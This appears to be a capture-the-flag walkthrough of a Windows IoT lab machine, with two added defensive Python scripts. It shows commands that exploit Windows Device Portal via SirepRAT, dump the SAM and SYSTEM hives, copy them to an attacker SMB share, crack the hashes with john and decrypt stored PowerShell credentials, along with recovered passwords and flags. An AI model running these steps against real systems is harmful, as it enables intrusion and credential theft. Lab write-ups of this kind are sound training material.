Service overview
Let's start with a port scan of the 10.10.10.204 machine using nmap:
$ nmap -sC -sV -p- -Pn -v 10.10.10.204
$ nmap --privileged -sU -sV -p- -Pn -v 10.10.10.204
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.91%I=7%D=5/29%Time=60B25E0D%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
We find Windows Device Portal, for which we'll use a public exploit:
git clone https://github.com/SafeBreach-Labs/SirepRAT
python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args " /c echo {{userprofile}}"
Let's dump the SAM and SYSTEM files:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SYSTEM C:\SYSTEM"
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c reg save HKLM\SAM C:\SAM"
Let's start a local Samba server to download the files, and copy them to our machine:
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SAM \\\\10.10.14.6\\Public\\SAM"
python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args " /c copy C:\SYSTEM \\\\10.10.14.6\\Public\\SYSTEM"
Let's extract the hashes and run a brute-force attack on them:
$ samdump2 SYSTEM SAM > hash
$ echo "aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95" > hash.txt
$ john --fork=4 --format=nt hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
app:mesh5143
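Added example (not from the original writeup): samdump2 prints one pwdump-format line per account, `user:rid:lmhash:nthash:::`, and the author copied one `lm:nt` pair into hash.txt by hand. The script below parses a whole dump of that shape and runs the checks a defender reviewing a SAM extract wants before anything is cracked: accounts with a blank password (the NT hash of the empty string), accounts whose LM hash is still stored (anything other than the empty-LM constant), and accounts that share the same NT hash (password reuse), then writes the `user:nthash` lines that john accepts with `--format=nt`. The sample dump is constructed; only the `app` hash is the one shown on the page, the other accounts and the Administrator hash are placeholders.

```python
"""Parse a samdump2 / pwdump-format SAM dump and audit it before cracking.

Added example, not the writeup's own code. SAMPLE_DUMP is constructed:
the 'app' hash is the one shown on the page, everything else is made up.
"""
import re
from collections import defaultdict

# Well-known constants: LM hash of an empty password, and the NT hash
# (MD4 over UTF-16LE) of the empty string.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample in samdump2 output format: user:rid:lm:nt:::
# samdump2 prefixes disabled accounts with "*disabled* ".
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
app:1000:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
svc_deploy:1001:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
"""


def parse_pwdump(text):
    """Return a list of dicts (user, rid, lm, nt, disabled) from pwdump lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        disabled = line.startswith("*disabled*")
        if disabled:
            line = line[len("*disabled*"):].strip()
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {raw!r}")
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            raise ValueError(f"malformed hash in line: {raw!r}")
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt,
                        "disabled": disabled})
    return entries


def audit_entries(entries):
    """Flag blank passwords, stored LM hashes and NT hashes shared by accounts."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        "lm_stored": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        "shared_nt": {h: users for h, users in by_nt.items() if len(users) > 1},
    }


def john_input(entries):
    """Lines for `john --format=nt`: user:nthash, skipping blank and disabled accounts."""
    return [f"{e['user']}:{e['nt']}" for e in entries
            if e["nt"] != EMPTY_NT and not e["disabled"]]


if __name__ == "__main__":
    parsed = parse_pwdump(SAMPLE_DUMP)
    for key, value in audit_entries(parsed).items():
        print(f"{key}: {value}")
    print("\n".join(john_input(parsed)))
```

In a real review the `shared_nt` finding is usually the most useful one: two accounts with the same NT hash have the same password, which you can report without cracking anything.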
Let's go to http://10.10.10.204:8080/#Device%20Settings and enter the credentials we obtained.
User flag
Command> dir C:\data\users\app
Volume in drive C is MainOS
Volume Serial Number is 3C37-C677
Directory of C:\data\users\app
07/04/2020 09:53 PM <DIR> .
07/04/2020 09:53 PM <DIR> ..
07/04/2020 07:28 PM <DIR> 3D Objects
07/04/2020 07:28 PM <DIR> Documents
07/04/2020 07:28 PM <DIR> Downloads
07/04/2020 07:28 PM <DIR> Favorites
07/04/2020 08:20 PM 344 hardening.txt
07/04/2020 08:14 PM 1,858 iot-admin.xml
07/04/2020 07:28 PM <DIR> Music
07/04/2020 07:28 PM <DIR> Pictures
07/04/2020 09:53 PM 1,958 user.txt
07/04/2020 07:28 PM <DIR> Videos
3 File(s) 4,160 bytes
9 Dir(s) 4,692,443,136 bytes free
Command> type C:\data\users\app\hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
Command> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::4943:80ed:ab82:e853
Temporary IPv6 Address. . . . . . : dead:beef::2d12:c117:bdc3:a673
Link-local IPv6 Address . . . . . : fe80::4943:80ed:ab82:e853%4
IPv4 Address. . . . . . . . . . . : 10.10.10.204
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
10.10.10.2
Command> powershell -c "$credential = import-clixml -path C:\Data\Users\app\iot-admin.xml;$credential.GetNetworkCredential().password"
Omni\Administrator:_1nt3rn37ofTh1nGz
Command> powershell -c "$credential = import-clixml -path C:\Data\Users\app\user.txt;$credential.GetNetworkCredential().password"
7cfd50f6bc34db3204898f1505ad9d70
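Added example (not from the original writeup): the two files above are PSCredential objects serialized with Export-Clixml. The password is stored as a SecureString, which on Windows is a DPAPI blob bound to the exporting user and machine, so any code running as that user can call Import-Clixml and read it back, exactly as the writeup does. The script below is a triage helper for a defender reviewing user profiles: it parses a CLIXML file, reports the UserName of any PSCredential it contains and whether the SecureString carries the DPAPI blob header (version 1 followed by the DPAPI provider GUID in little-endian order), without decrypting anything. The XML and the blob bytes are constructed stand-ins that mirror the Export-Clixml layout.

```python
"""Triage a PowerShell CLIXML file for serialized PSCredential objects.

Added example, not the writeup's own code. SAMPLE_CLIXML is constructed
to mirror Export-Clixml output; the SecureString hex is a stand-in blob.
"""
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# A DPAPI blob starts with version 0x00000001 and the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian byte order.
DPAPI_MAGIC = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">EXAMPLE\\svc_account</S>
      <SS N="Password">{DPAPI_MAGIC}{'00' * 16}</SS>
    </Props>
  </Obj>
</Objs>"""

# A CLIXML file holding something other than a credential (constructed).
SAMPLE_OTHER = f'<Objs Version="1.1.0.1" xmlns="{PS_NS}"><S>hello</S></Objs>'


def triage_clixml(text):
    """Return one finding per PSCredential object found in the CLIXML text."""
    root = ET.fromstring(text)
    ns = {"ps": PS_NS}
    findings = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        type_names = [t.text for t in obj.findall("ps:TN/ps:T", ns)]
        if "System.Management.Automation.PSCredential" not in type_names:
            continue
        user = obj.find("ps:Props/ps:S[@N='UserName']", ns)
        secret = obj.find("ps:Props/ps:SS[@N='Password']", ns)
        blob = (secret.text or "").strip().lower() if secret is not None else ""
        findings.append({
            "username": user.text if user is not None else None,
            "has_secure_string": secret is not None,
            # True when the SecureString is a DPAPI blob, i.e. readable only
            # by the exporting user on the exporting machine.
            "dpapi_protected": blob.startswith(DPAPI_MAGIC),
            "blob_bytes": len(blob) // 2,
        })
    return findings


if __name__ == "__main__":
    for finding in triage_clixml(SAMPLE_CLIXML):
        print(finding)
```

The practical point for a review: DPAPI user scope is a boundary between users, not a secret store within one account. A credential file left in a profile is as exposed as that account's session, so finding one next to the user's other documents is a finding in itself.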
Let's log in again as administrator.
Root flag
$ powershell -c "$credential = import-clixml -path C:\Data\Users\administrator\root.txt;$credential.GetNetworkCredential().password"
5dbdce5569e2c4708617c0ce6e9bf11d